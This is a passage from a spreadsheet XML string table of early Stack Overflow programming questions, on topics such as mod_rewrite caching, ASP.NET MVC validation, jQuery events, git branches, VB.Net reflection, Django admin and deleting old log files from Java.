                                  //  a namespace alias is preferred practice in real code
using namespace std;
int main()
{
    cout &amp;lt;&amp;lt; "Hello, world!" &amp;lt;&amp;lt; endl;
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>RewriteRule checking file in rewriten file path exists</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you use ModRewrite to check if a cache file exists, and if it does, rewrite to the cache file and otherwise rewrite to a dynamic file. &lt;/p&gt;
&lt;p&gt;For example I have the following folder structure:&lt;/p&gt;
&lt;pre&gt;
pages.php
cache/
  pages/
   1.html
   2.html
   textToo.html
   etc.
&lt;/pre&gt;
&lt;p&gt;How would you setup the RewriteRules for this so request can be send like this:&lt;/p&gt;
&lt;pre&gt;
example.com/pages/1
&lt;/pre&gt;
&lt;p&gt;And if the cache file exists rewrite tot the cache file, and if the cache file does not exists, rewrite to pages.php?p=1&lt;/p&gt;
&lt;p&gt;It should be something like this: (note that this does not work, otherwise I would not have asked this)&lt;/p&gt;
&lt;pre&gt;
RewriteRule ^pages/([^/\.]+) cache/pages/$1.html [NC,QSA]
RewriteCond %{REQUEST_FILENAME} -f [NC,OR] 
RewriteCond %{REQUEST_FILENAME} -d [NC] 
RewriteRule cache/pages/([^/\.]+).html pages.php?p=$1 [NC,QSA,L]
&lt;/pre&gt;
&lt;p&gt;I can off coarse do this using PHP but I thought it had to be possible using mod_rewrite.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to validate this scenario in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First, a little bit of context (cause I know you all love it!):&lt;/p&gt;
&lt;p&gt;I have a model called &lt;strong&gt;Note&lt;/strong&gt;. It has a field called &lt;strong&gt;Type&lt;/strong&gt; which, in the database, is an integer value that designates which type of object this note belongs to (1 = Customer, 2 = Sales Lead, etc). A second field called &lt;strong&gt;Source&lt;/strong&gt; designates the ID of the specific object that this note belongs to.&lt;/p&gt;
&lt;p&gt;For example, if I wanted to add a note to Customer #34, I would set &lt;strong&gt;Type&lt;/strong&gt; to 1 and &lt;strong&gt;Source&lt;/strong&gt; to 34.&lt;/p&gt;
&lt;p&gt;To help make things a little more readable, I have an Enum called &lt;strong&gt;DataObjectType&lt;/strong&gt; that contains a mapping for each of the possible &lt;strong&gt;Type&lt;/strong&gt; integer values to a friendly name. So, for example, &lt;strong&gt;DataObjectType.Customer&lt;/strong&gt; is the same as a value of 1 in the &lt;strong&gt;Type&lt;/strong&gt; field.&lt;/p&gt;
&lt;p&gt;Next, I have a custom route:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/Notes/New/{type}/{id}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and two controller actions to handle the creation of a new note:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AcceptVerbs(HttpVerbs.Get)]
public ActionResult New(DataObjectType type, int id) {
    Note note = new Note { Type = type, Source = id };
    return View(note);
}
[AcceptVerbs(HttpVerbs.Post)]
public ActionResult Create(Note note) {
    // This is just an example
    note.Persist();
    return View("New", note);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;First of all, I need to make sure that the value supplied to the &lt;strong&gt;{type}&lt;/strong&gt; route value is valid for the &lt;strong&gt;DataObjectType&lt;/strong&gt; enum. Can this be done with a route constraint? At the moment, the type argument of &lt;strong&gt;New()&lt;/strong&gt; will accept any integer, whether it exists in &lt;strong&gt;DataObjectType&lt;/strong&gt; or not.&lt;/p&gt;
&lt;p&gt;Second, I need to make sure that the object the user is trying to add the note to actually exists in the database before showing the New Note form at all. I could do this in the &lt;strong&gt;New()&lt;/strong&gt; method easily, but there may come a time when a user posts the data directly to &lt;strong&gt;Create()&lt;/strong&gt; without ever visiting &lt;strong&gt;New()&lt;/strong&gt;. In such a case, I also need to verify that the object exists in the &lt;strong&gt;Create()&lt;/strong&gt; method. What's the best way to do this in both methods without duplicating code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible, and what is the simplest way, to wrap events in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I would like to simulate the "active" behavior that most browsers support for links when they are clicked. For any element and event I would like to be able to add a css class to the element for the duration of the event. So in psuedo jQuery code I'd like to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(".button").click(function() { alert('clicked'); });
.....
$(".button").each( function()
    {
    	var self = $(this);
    	var innerClick = self.click;
    	self.click( function()
    		{
    			self.addClass('active');
    			innerClick();
    			self.removeClass('active');
    		});
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bonus points for anyone that can suggest a solution that is robust enough to maintain the wrapping if I bind further handlers to 'click'.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Jython and python modules</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just started using the &lt;code&gt;PythonInterpreter&lt;/code&gt; from within my Java classes, and it works great! However, if I try to include python modules (&lt;code&gt;re&lt;/code&gt;, &lt;code&gt;HTMLParser&lt;/code&gt;, etc.), I'm receiving the following exception (for &lt;code&gt;re&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;
Exception in thread "main" Traceback (innermost last):
  File "", line 1, in ?
ImportError: no module named re
&lt;/pre&gt;
&lt;p&gt;How could I make the classes from the jython jar "see" the modules python has available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I remove VSS hooks from a VS Web Site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Visual Studio 2008 solution with 7 various projects included with it.  3 of these 'projects' are Web Sites (the kind of project without a project file).&lt;/p&gt;
&lt;p&gt;I have stripped all the various Visual Sourcesafe files from all the directories, removed the Scc references in the SLN file and all the project files that exist.  I deleted the SUO file and all the USER files also.  Visual Studio still thinks that 2 of the Web Sites are still under source control, and it adds the Scc entries back into the SLN file for me.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Does anybody know &lt;em&gt;how&lt;/em&gt; VS still knows about the old source control?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt;
Another thing that I didn't mention is that the files I'm trying to remove VSS hooks from has been copied outside of VSS's known working directories, the python script run and manual edits to files made before the solution is opened in VS 2008 or VS 2005 (I had the problem with both).&lt;/p&gt;
&lt;p&gt;Here is a python script that I used to weed out these files and let me know which files needed manually edited.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import os, stat
from os.path import join
def main():
  startDir = r"C:\Documents and Settings\user\Desktop\project"
  manualEdits = []
  for root, dirs, files in os.walk(startDir, topdown=False):
    if '.svn' in dirs:
      dirs.remove('.svn')
    for name in files:
      os.chmod(join(root,name), stat.S_IWRITE)
      if name.endswith(".vssscc") or name.endswith(".scc") or name.endswith(".vspscc") or name.endswith(".suo") or name.endswith(".user"):
        print "Deleting:", join(root, name)
        os.remove(join(root,name))
      if name.endswith("sln") or name.endswith("dbp") or name.endswith("vbproj") or name.endswith("csproj"):
        manualEdits.append(join(root, name))
  print "Manual Edits are needed for these files:"
  for name in manualEdits:
    print name
if __name__ == "__main__":
  main()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I reference a popup window from two different pages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to allow a user to click a link in "page-1.htm" and open a popup window. Then, when the user browses to "page-2.htm" in the main browser window I need to be able to reference the popup window.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;JavaScript in  "page-1.htm"&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var playerWin = window.open("player.htm", "playerWin", "width=300,height=130");
playerWin.play("song.mp3");  // play() is a function in player.htm
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;JavaScript in  "page-2.htm"&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;playerWin.play("tune.mp3");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code in page-2.htm generates an error "playerWin is not defined".  That is understandable because no variable named &lt;em&gt;playerWin&lt;/em&gt; has been defined on page-2.htm. &lt;/p&gt;
&lt;p&gt;My question is: Am I able to reference the popup window from page-2.htm?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom Control events not firing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom control with a LinkButton on it.  When I click the LinkButton, its click event does not fire.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ToolboxData("&amp;lt;{0}:View runat=server&amp;gt;&amp;lt;/{0}:View&amp;gt;")]
public class View : Control
{
    private LinkButton lbNextPage;
    protected override void CreateChildControls()
    {
        lbNextPage = new LinkButton() { ID = "lbNextPage", Text = "Next Page" };
        lbNextPage.Click += delegate(object sender, EventArgs e)
        {
            Page.Response.Write("Event Fires!");
        };
        Controls.Add(lbNextPage);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have extracted only the code responsible for the rendering of the LinkButton and its event (which is what is included above), so as to remove all other factors.  &lt;/p&gt;
&lt;p&gt;Any idea why the event is not firing?  Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>git: switch branch without detaching head</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a repository on github with a main branch (master) and a branch for some experimental work.  I made some commits and pushed to the experimental branch and everything was fine.&lt;/p&gt;
&lt;p&gt;Now, on a different machine, I try to clone my repository (git clone &lt;em&gt;repository&lt;/em&gt;) and then switch to the experimental branch (git checkout &lt;em&gt;branchname&lt;/em&gt;) but every time I do this my head gets detached and I can't push my changes.  What am I doing wrong?  I get the feeling I'm missing a fundamental git concept someplace but reading random git man pages isn't giving me any clues.&lt;/p&gt;
&lt;p&gt;I'm new to git so I'm sorry if I'm being an idiot but I can't find anything in the docs that will help me reattach my head.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The concept of a tracking branch is what I was missing.  Now that I grok that concept everything is clear.  Personally, I find the &lt;code&gt;git branch --track&lt;/code&gt; syntax to be much more intuitive than &lt;code&gt;git checkout -b branch-name origin/branch-name&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Thanks for the help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use reflection to set a property value to Nothing (Null)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Edit: Based on the answer from LoveMeSomeCode, I believe this issue only appears in VB.Net.&lt;/p&gt;
&lt;p&gt;I'm trying to revert a class to a previous state by saving the old values of changed properties in a dictionary and setting them via reflection when I need to revert. I'm having a problem where if the old value is Nothing (null) I get a null reference exception when trying to set the property. Here's what I've tried.&lt;/p&gt;
&lt;p&gt;Assume a for each loop like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;For Each pair As KeyValuePair(Of String, Object) In myOldValues
...
Next
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Method 1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CallByName(Me, pair.Key, CallType.Set, pair.Value)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Method 2:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Me.GetType().InvokeMember(pair.Key, Reflection.BindingFlags.SetProperty, Nothing, Me, pair.Value)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Method 3:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim propInfo As System.Reflection.PropertyInfo = Me.GetType.GetProperty(pair.Key)
propInfo.SetValue(Me, Convert.ChangeType(pair.Value, propInfo.PropertyType), Nothing)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For each of these methods I get a null reference exception when pair.Value is null. The setter is capable of holding a null value (frequently the property is a string). What am I doing wrong or how can I work around it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Each method fails if I pass it null directly as well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Here are the stack traces if they help anyone:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 1&lt;/strong&gt;
System.NullReferenceException: Object reference not set to an instance of an object.
   at Microsoft.VisualBasic.CompilerServices.Symbols.Container.InvokeMethod(Method TargetProcedure, Object[] Arguments, Boolean[] CopyBack, BindingFlags Flags)
   at Microsoft.VisualBasic.CompilerServices.NewLateBinding.LateSet(Object Instance, Type Type, String MemberName, Object[] Arguments, String[] ArgumentNames, Type[] TypeArguments, Boolean OptimisticSet, Boolean RValueBase, CallType CallType)
   at Microsoft.VisualBasic.CompilerServices.Versioned.CallByName(Object Instance, String MethodName, CallType UseCallType, Object[] Arguments)
   at &lt;em&gt;myProject&lt;/em&gt;.Presenter.CustomerDetailPresenter.RevertCustomer() in &lt;em&gt;myfile&lt;/em&gt;:line 378&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 2&lt;/strong&gt;
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---&gt; System.NullReferenceException: Object reference not set to an instance of an object.
   at &lt;em&gt;myProject&lt;/em&gt;.Presenter.CustomerDetailPresenter.set_City(String value)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle._InvokeMethodFast(Object target, Object[] arguments, SignatureStruct&amp;amp; sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.RuntimeMethodHandle.InvokeMethodFast(Object target, Object[] arguments, Signature sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean skipVisibilityChecks)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
   at System.Type.InvokeMember(String name, BindingFlags invokeAttr, Binder binder, Object target, Object[] args)
   at &lt;em&gt;myProject&lt;/em&gt;.Presenter.CustomerDetailPresenter.RevertCustomer()&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 3&lt;/strong&gt;
System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---&gt; System.NullReferenceException: Object reference not set to an instance of an object.
   at &lt;em&gt;myProject&lt;/em&gt;.Presenter.CustomerDetailPresenter.set_City(String value)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle._InvokeMethodFast(Object target, Object[] arguments, SignatureStruct&amp;amp; sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.RuntimeMethodHandle.InvokeMethodFast(Object target, Object[] arguments, Signature sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean skipVisibilityChecks)&lt;/p&gt;
&lt;p&gt;at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
   at System.Type.InvokeMember(String name, BindingFlags invokeAttr, Binder binder, Object target, Object[] args)
   at &lt;em&gt;myProject&lt;/em&gt;.Presenter.CustomerDetailPresenter.RevertCustomer()&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide text using css</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a tag in my html like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h1&amp;gt;My Website Title Here&amp;lt;/h1&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using css I want to replace the text with my actual logo. I've got the logo there no problem via resizing the tag and putting a background image in via css. However, I can't figure out how to get rid of the text. I've seen it done before basically by pushing the text off the screen. The problem is I can't remember where I saw it. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Customizing an Admin form in Django while also using autodiscover</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to modify a few tiny details of Django's built-in &lt;code&gt;django.contrib.auth&lt;/code&gt; module.  Specifically, I want a different form that makes username an email field (and email an alternate email address.   (I'd rather not modify &lt;code&gt;auth&lt;/code&gt; any more than necessary -- a simple form change &lt;em&gt;seems&lt;/em&gt; to be all that's needed.)&lt;/p&gt;
&lt;p&gt;When I use &lt;code&gt;autodiscover&lt;/code&gt; with a customized &lt;code&gt;ModelAdmin&lt;/code&gt; for &lt;code&gt;auth&lt;/code&gt; I wind up conflicting with &lt;code&gt;auth&lt;/code&gt;'s own admin interface and get an "already registered" error.&lt;/p&gt;
&lt;p&gt;It looks like I have to create my own admin site, enumerating all of my Models.  It's only 18 classes, but it seems like a DRY problem -- every change requires both adding to the Model &lt;strong&gt;and&lt;/strong&gt; adding to the customized admin site.&lt;/p&gt;
&lt;p&gt;Or, should I write my own version of "&lt;code&gt;autodiscover&lt;/code&gt; with exclusions" to essentially import all the &lt;code&gt;admin&lt;/code&gt; modules &lt;strong&gt;except&lt;/strong&gt; &lt;code&gt;auth&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Managing Reusable Components</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have projects A and B. Both projects use component C (a graphical library for example). I get a issue ticket reporting that A has a bug. I determine that really the bug is in the C component. I create a branch for C, fix it, check back in, retag it, change the dependencies on A and create a new A install. &lt;/p&gt;
&lt;p&gt;Question: How can I make B aware of the change in its C component so it can benefit of the bug fix detected in A? What would be a good tool/script to control such configuration management scenarios? I tried with Jira but I could not find a good way of making two projects dependent of one or more components.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to integrate two ASP.NET sites</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two ASP.NET sites that are used for managing patient information.  One application allows entry/edit of the patient demographics and the other allows different types of assessments to be completed for each patient.  The two sites each have a distinct look and feel and both use SSL.&lt;/p&gt;
&lt;p&gt;One of our analysts wants to have a "launch page" (a third application, basically) that will allow the user to lookup a patient record on the launch page and then after choosing a patient, click on a button to launch them either into the data entry application or into the assessment application.&lt;/p&gt;
&lt;p&gt;I'm hesitant to do this for a number of reasons... 1) these are two separate applications and were designed to be separate apps and will always be used as separate applications by most users.  2) Because the apps have a different look/feel, the user will know they are being shuffled around two applications.  3) Being separate apps, how difficult will it be to pass my login credentials from the launch page to the other two apps?  4) Are there any SSL implications when bouncing between separate apps with different URLs?&lt;/p&gt;
&lt;p&gt;Ideally we would combine the two apps into one and turn features on and off based on the user's needs, but that is not an option at this time.&lt;/p&gt;
&lt;p&gt;Any advice and/or insight will be appreciated!  &lt;/p&gt;
&lt;p&gt;Thanks much...DL&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python/Twisted multiuser server - what is more efficient?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Python, if I want my server to scale well CPU-wise, I obviously need to spawn multiple processes. I was wondering which is better (using Twisted):&lt;/p&gt;
&lt;p&gt;A) The manager process (the one who holds the actual socket connections) puts received packets into a shared queue (the one from the multiprocessing module), and worker processes pull the packets out of the queue, process them and send the results back to the client.&lt;/p&gt;
&lt;p&gt;B) The manager process (the one who holds the actual socket connections) launches a deferred thread and then calls the apply() function on the process pool. Once the result returns from the worker process, the manager sends the result back to the client.&lt;/p&gt;
&lt;p&gt;In both implementations, the worker processes use thread pools so they can work on more than one packet at once (since there will be a lot of database querying).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you give a junior developer a shot on a big project with tight deadlines?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for advice on how to give a junior developer a chance to gain experience on a big project with tight deadlines without hurting the timeline. If we all know it will take a little longer with the developer because of less experience, then what is the best way to give them a portion of the project and spread the risk? Giving these developers the ability to learn on the job on real projects instead of handing down maintenance work all the time is important to me, and I want to find a way to make it work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database update after inserting rows into Dataset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a newbie to Database programming. After inserting a couple of rows into a DataSet object, I am trying to write back the updated DataSet to the Database but cannot figure out how to do it.&lt;/p&gt;
&lt;p&gt;Can you give an example for the following please?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what SQL insert command to use if DataSet is already updated with new rows&lt;/li&gt;
&lt;li&gt;Databinding example - especially considering an initially empty table in the DB&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am using SQLExpress 2008 &amp;amp; its C# WinForms application.&lt;/p&gt;
&lt;p&gt;thanks&lt;/p&gt;
&lt;p&gt;ps: I have already looked at the related questions here. This one is different in that I am first adding my new data into a DataSet and want to update the DB then.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net http server push to client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to push info from a server to a web client? I know it's possible to setup sockets with Silverlight and Flash but I want to stay way from those two technologies.&lt;/p&gt;
&lt;p&gt;Gmail seems to do a great job of polling the servers for updated emails and even their chat programs work great (all working in my web browser). Any ideas on the best way to do something like this but using asp.net?&lt;/p&gt;
&lt;p&gt;Edit:
If I have to poll, i'd like to poll the server every 2 or 3 seconds. So I'm not sure how to do this without bringing the web server to it's knees under heavy usage.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How I do to force the browser to not store the html form field data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When typing in html forms, browsers like firefox or ie store the values, sometimes quietly. So when typing in another webforms, the browser smartly suggest the same information. Another method to show the dropdown list is double-clicking an empty textbox.&lt;/p&gt;
&lt;p&gt;In a e-commerce website, the customer type the credit card number, and another sensitive information. How I do to avoid or block the browser to store that sensitive information?&lt;/p&gt;
&lt;p&gt;Another worry is about tampered form data stored (by a malware, by example). Then the customer can select this contaminated data and compromise the site.&lt;/p&gt;
&lt;p&gt;Regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practices - set jQuery property from Code-Behind</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to set a single property in a jQuery command using a value that is calculated in the code-behind. My initial thought was to just use &lt;code&gt;&amp;lt;%= %&amp;gt;&lt;/code&gt; to access it like this:&lt;/p&gt;
&lt;p&gt;.aspx&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript" language="javascript"&amp;gt;
$('.sparklines').sparkline('html', {
    fillColor: 'transparent',
    normalRangeMin: '0',
    normalRangeMax: &amp;lt;%= NormalRangeMax() %&amp;gt;
});
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;.aspx.cs&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected string NormalRangeMax() {
    // Calculate the value.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It smells odd to have to call from the ASPX page to just get a single value though. Not to mention I have an entire method that does a small calculation just to populate a single property.&lt;/p&gt;
&lt;p&gt;One alternative would be to create the entire &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; block in the code-behind using &lt;code&gt;clientScriptManager.RegisterClientScriptBlock&lt;/code&gt;. But I really don't like putting entire chunks of JavaScript in the code-behind since its, well, JavaScript.&lt;/p&gt;
&lt;p&gt;Maybe if I end up having many of these methods I can just put then in a partial class so at least they are physically separate from the rest of the code.&lt;/p&gt;
&lt;p&gt;What method would you recommend as being easy to understand and easy to maintain?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why NSUserDefaults failed to save NSMutableDictionary in iPhone SDK?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to save an &lt;code&gt;NSMutableDictionary&lt;/code&gt; object in &lt;code&gt;NSUserDefaults&lt;/code&gt;. The key type in &lt;code&gt;NSMutableDictionary&lt;/code&gt; is &lt;code&gt;NSString&lt;/code&gt;, the value type is &lt;code&gt;NSArray&lt;/code&gt;, which contains a list of object which implements &lt;code&gt;NSCoding&lt;/code&gt;. Per document, &lt;code&gt;NSString&lt;/code&gt; and &lt;code&gt;NSArray&lt;/code&gt; both are conform to &lt;code&gt;NSCoding&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I am getting this error: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[NSUserDefaults setObject: forKey:]: Attempt to insert non-property value.... of class NSCFDictionary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any solution for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mod_rewrite generating errors in log</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my site I have mod_rewrite rules to make the URLs more search engine friendly, and it all works fine on the frontend, but I'm getting errors in the error log like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Thu Jan 22 22:51:36 2009] [error] [client {IP ADDRESS HERE}] File does not exist: /{some rewritten directory}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The rules I'm using are rather simple, along the lines of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteRule ^pages/(.*)_(.*).html$ page.php?id=$2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to avoid these errors?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>examples of both good and bad application user interface design?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a blind student who's taking a required UI class. One of the assignments is to take screen shots of both a good and bad application user interface and comment on what's good and bad about it. I'll have a reader help describe the interface to me but would like pointers on applications to check out. They must be windows apps. In answers I'd like a link to the application as well as brief comments on what to focus on in the UI, for example color scheme is horrible, badly labeled controls, cluttered layout, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC and Automatic RESTful Features</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does ASP.NET MVC have anything like the RESTful out-of-the-box features like Ruby on Rails 2.0?&lt;br /&gt;
For example: &lt;a href="http://www.viget.com/extend/curl-and-your-rails-2-app/" rel="nofollow"&gt;cURL and Your Rails 2 App&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I think this is the built in REST access to your Models. Since models can be implemented in different ways in ASP.NET MVC is there a feature like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java and unix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to delete the old log files in log directory.
To delete the log files which are more than 6 months,
I have written the script like&lt;/p&gt;
&lt;p&gt;find /dnbusr1/ghmil/BDELogs/import -type f -mtime +120 -exec rm -f {} \;&lt;/p&gt;
&lt;p&gt;By using this script i can able to delete the old files. But how to invoke this script  by using java? please any one help me...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to read or capture Ctrl+some key or Alt+some key in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example I want to do some thing when some combination of &lt;kbd&gt;Ctrl&lt;/kbd&gt; key with any other key is pressed (or it may be &lt;kbd&gt;Alt&lt;/kbd&gt; key).Then from the standard input how to read that key combination in C program as an input. 
&lt;p&gt;I tried with simple &lt;code&gt;getchar()&lt;/code&gt; to know the ASCII values of these combinations. But it was some 1 to 25 and some other values for some key combinations. Is there any standard library function to read them. Dont ask me why do you want to do that.
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: My platform is Turbo C on Windows.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anybody provide XMLTextReader Custom Logic to read large XML fast...?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want a help that i need a custom logic to read large XML of size 1GB.&lt;/p&gt;
&lt;p&gt;Thanks 
sivaram&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Usage of __slots__?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the purpose of &lt;a href="https://docs.python.org/3/reference/datamodel.html#slots"&gt;&lt;code&gt;__slots__&lt;/code&gt;&lt;/a&gt; in Python â€” especially with respect to when would I want to use it and when not?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby on rails application root</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I change a rails app so that a controller foo appears as the application root? &lt;/p&gt;
&lt;p&gt;In other words, right now all the urls look like host.com/foo/... and I'd like to get rid of the foo and have simply host.com/... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>cool project to use a genetic algorithm for?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a practical application to use a genetic algorithm for. Some things that have thought of are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Website interface optimization&lt;/li&gt;
&lt;li&gt;Vehicle optimization with a physics simulator&lt;/li&gt;
&lt;li&gt;Genetic programming&lt;/li&gt;
&lt;li&gt;Automatic test case generation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But none have really popped out at me. So if you had some free time (a few months) to spend on a genetic algorithms project, what would you choose to tackle?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running a managed application 2nd time shows different performance than 1st</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a benchmarking application to test out the performance of some APIs that I have written. In this benchmarking application, I am basically using the QueryPerformanceCounter and getting the timing by dividing the difference of QPC values after and before calling into the API, by the frequency. But the benchmarking results seems to vary If I run the application (same executable running on the same set of Dlls) from different drives. Also, on a particular drive, running the application for the 1st time, closing the application and re-running it again produces different benchmarking results. Can anyone explain this behavior? Am I missing something here?&lt;/p&gt;
